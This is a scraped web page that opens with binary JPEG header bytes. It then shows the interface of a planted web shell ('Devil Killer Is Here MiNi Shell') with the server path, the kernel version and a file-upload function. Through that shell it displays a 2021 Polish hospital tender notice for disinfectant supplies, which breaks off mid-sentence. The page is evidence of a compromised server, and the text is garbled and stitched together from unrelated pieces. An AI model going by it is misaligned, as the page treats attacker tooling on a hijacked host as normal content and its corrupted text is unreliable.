JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211027/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211027/0024802402-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa preparatów dezynfekcyjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Specjalistyczny Szpital Miejski im. Mikolaja Kopernika w Toruniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 870252274</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Batorego 17/19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@med.torun.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.med.torun.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa preparatów dezynfekcyjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b29a0cc-3712-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00248024</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00018821/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.85 Dostawa środków dezynfekcyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.med.torun.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja<br/>pomiędzyZamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków,<br/>zawiadomień orazprzekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>miniPortaluhttps://miniportal.uzp.gov.pl, ePUAP https://epuapa.gov.pl/wps/portal. Zamawiający może<br/>równieżkomunikować się z Wykonawcami za pomocą poczty elektronicznej: dzp@med.torun.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>użyciu systemówminiPortal i ePUAP opisane zostały w Regulaminie korzystania z miniPortau oraz<br/>Regulaminie ePUAP.Regulaminy te stanowią integralną część SWZ w zakresie, w jakim określają<br/>zasady oraz wymaganiatechniczne i organizacyjne wysyłania i odbierania elektronicznych dokumentów<br/>i informacjiprzekazywanych przy ich użyciu.2. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwemdedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularzkomunikacji w ramach systemu ePUAP wynosi 150 MB. 3. Zainteresowany złożeniem<br/>ofertyWykonawca winien zapoznać się z aktualnymi wytycznymi technicznymi zawartymi w<br/>przywołanychRegulaminach. Przystąpienie do postępowania jest równoznaczne z akceptacją<br/>warunków korzystaniaz miniPortalu i ePUAP oraz przywołanych Regulaminów. 4. Szczegółowe<br/>instrukcje użytkowaniaminiPortalu (narzędzia udostępnionego przez Urząd Zamówień Publicznych,<br/>MinisterstwoPrzedsiębiorczości i Technologii oraz Ministerstwo Cyfryzacji) dostępne są na<br/>stronie:https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i<br/>2rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawieochronyosóbfizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnegoprzepływutakichdanych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochroniedanych) (Dz. Urz.UE L119z04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>administratoremPani/Pana danychosobowych jest Specjalistyczny Szpital Miejski im. M. Kopernika w<br/>Toruniu, ul.Batorego 17/19, 87-100Toruń; inspektorem ochrony danych osobowych w Specjalistycznym<br/>SzpitaluMiejskim im. M.Kopernika w Toruniu jest Pani/Pani Ewa Kacprzak, iod@med.torun.pl;<br/>Pani/Pana daneosoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniemoudzielenie zamówienia publicznego nr sprawy SSM.DZP.200.45.2021 prowadzonym<br/>wtrybiepodstawowym; odbiorcami Pani/Pana danych osobowych będą osoby lub<br/>podmioty,którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96<br/>ust.3 ustawyzdnia29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579<br/>i2018),dalej„ustawa Pzp”; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust.<br/>1ustawy Pzp,przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czastrwaniaumowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy;obowiązekpodania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jestwymogiemstawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu oudzieleniezamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawyPzp; wodniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>wsposóbzautomatyzowany, stosowanie do art. 22 RODO; posiada Pani/Pan:− na<br/>podstawieart.15RODOprawodostępu do danych osobowych Pani/Pana dotyczących;− na podstawie<br/>art.16RODO prawo dosprostowania Pani/Pana danych osobowych **;− na podstawie art. 18 RODO<br/>prawożądania odadministratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniemprzypadków, o którychmowa w art. 18 ust. 2 RODO ***; − prawo do wniesienia skargi do<br/>PrezesaUrzędu Ochrony DanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowychPani/Pana dotyczących naruszaprzepisy RODO; nie przysługuje Pani/Panu:− w związku z<br/>art. 17 ust. 3lit. b, d lube RODO prawo dousunięcia danych osobowych;− prawo do przenoszenia<br/>danychosobowych, o którym mowa wart.20RODO;− na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobecprzetwarzania danych osobowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SSM.DZP.200.138.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Preparaty do dezynfekcji i mycia narzędzi chirurgicznych oraz sprzętu endoskopowego zarejestrowane jako wyroby medyczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Przedmiot umowy w czasie trwania niniejszej umowy może ulec zmniejszeniu<br/>zzastrzeżeniemjednak, że zmniejszenie ilości zamówionego asortymentu nie przekroczy 30%.<br/>Wprzypadkuniewykorzystania przez Odbiorcę w całości przedmiotu umowy Dostawcy<br/>nieprzysługuje żadneroszczenie <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Preparaty do dezynfekcji powierzchni w obszarach medycznych oraz sprzętu medycznego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Przedmiot umowy w czasie trwania niniejszej umowy może ulec zmniejszeniu<br/>zzastrzeżeniemjednak, że zmniejszenie ilości zamówionego asortymentu nie przekroczy 30%.<br/>Wprzypadkuniewykorzystania przez Odbiorcę w całości przedmiotu umowy Dostawcy<br/>nieprzysługuje żadneroszczenie <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Preparaty do odkażania skóry i błon śluzowych oraz przedoperacyjnej toalety ciała pacjenta, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Przedmiot umowy w czasie trwania niniejszej umowy może ulec zmniejszeniu<br/>zzastrzeżeniemjednak, że zmniejszenie ilości zamówionego asortymentu nie przekroczy 30%.<br/>Wprzypadkuniewykorzystania przez Odbiorcę w całości przedmiotu umowy Dostawcy<br/>nieprzysługuje żadneroszczenie <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Preparaty myjąco-dezynfekujące do powierzchni i sprzętu endoskopowego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Przedmiot umowy w czasie trwania niniejszej umowy może ulec zmniejszeniu<br/>zzastrzeżeniemjednak, że zmniejszenie ilości zamówionego asortymentu nie przekroczy 30%.<br/>Wprzypadkuniewykorzystania przez Odbiorcę w całości przedmiotu umowy Dostawcy<br/>nieprzysługuje żadneroszczenie <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) informacji z Krajowego Rejestru Karnego w zakresie: -art. 108 ust. 1 pkt<br/>1 i 2 uPzp,-art.<br/>108ust.1pkt4uPzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>karnego,sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem, b) oświadczenia wykonawcy,w zakresieart. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej wrozumieniu<br/>ustawy zdnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020r.poz.1076 i<br/>1086), z innymwykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek odopuszczenie<br/>do udziału wpostępowaniu, albo oświadczenia o przynależności do tej samejOgłoszenie nr 2021/BZP<br/>00050441 zdnia 2021-05-102021-05-10 Biuletyn Zamówień PublicznychOgłoszenie o zamówieniu -<br/>Zamówienieudzielane jest w trybie podstawowym na podstawie: art. 275pkt 1 ustawy - Dostawy grupy<br/>kapitałowejwraz z dokumentami lub informacjami potwierdzającymiprzygotowanie oferty, oferty<br/>częściowej lubwniosku o dopuszczenie do udziału w postępowaniuniezależnie od innego wykonawcy<br/>należącego dotej samej grupy kapitałowej, według wzorustanowiącego załącznik nr 5 do SWZ,<br/>c)odpisu lub informacjiz Krajowego Rejestru Sądowego lub zCentralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, wzakresie art. 109 ust. 1 pkt 4 uPzp,sporządzonych nie wcześniej<br/>niż3miesiące przed jej złożeniem,jeżeli odrębne przepisy wymagająwpisu do rejestru lub ewidencji;<br/>d)oświadczenia wykonawcy oaktualności informacji zawartych woświadczeniu, o którym mowa w<br/>art.125ust. 1 uPzp, w zakresiepodstaw wykluczenia z postępowaniawskazanych przez zamawiającego,<br/>o których mowa w:-art.108ust. 1 pkt 3 uPzp,-art. 108 ust. 1 pkt 4uPzp, dotyczących orzeczenia zakazu<br/>ubiegania się ozamówienie publiczne tytułem środkazapobiegawczego,-art. 108 ust. 1 pkt<br/>5uPzp,dotyczącychzawarciaz innymi wykonawcamiporozumienia mającego na celu zakłócenie<br/>konkurencji,-art. 108 ust. 1pkt 6uPzp,-art. 109 ust. 1 pkt. 6uPzp</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) opisy lub katalogi bądź karty techniczne oferowanych przez Wykonawcę towarów, potwierdzające, że oferowane przez Wykonawcę towary odpowiadają określonym przez Zamawiającego w załączniku nr 1 wymaganiom, <br/>2) Dla potwierdzenia, że oferowane przez Wykonawcę towary są dopuszczone do obrotu i używania następujące dokumenty: <br/>a) w zakresie towarów będących wyrobami medycznym - dopuszczenie do obrotu wyrobu medycznego zgodnie z przepisami aktualnie obowiązującej ustawy o wyrobach medycznych,<br/>b) w zakresie towarów będących produktami leczniczymi – dopuszczenie do obrotu produktu leczniczego na terenie RP zgodnie z przepisami aktualnie obowiązującej ustawy Prawo Farmaceutyczne,<br/>c) w zakresie towarów będących produktami biobójczymi – pozwolenie na wprowadzenia do obrotu produktu biobójczego zgodnie z aktualnie obowiązującą ustawą o produktach biobójczych,<br/>d) w zakresie towarów będących kosmetykami – oświadczenia o wprowadzeniu do obrotu kosmetyku zgodnie z aktualnie obowiązującym Rozporządzeniem Parlamentu Europejskiego i Rady WE w sprawie produktów 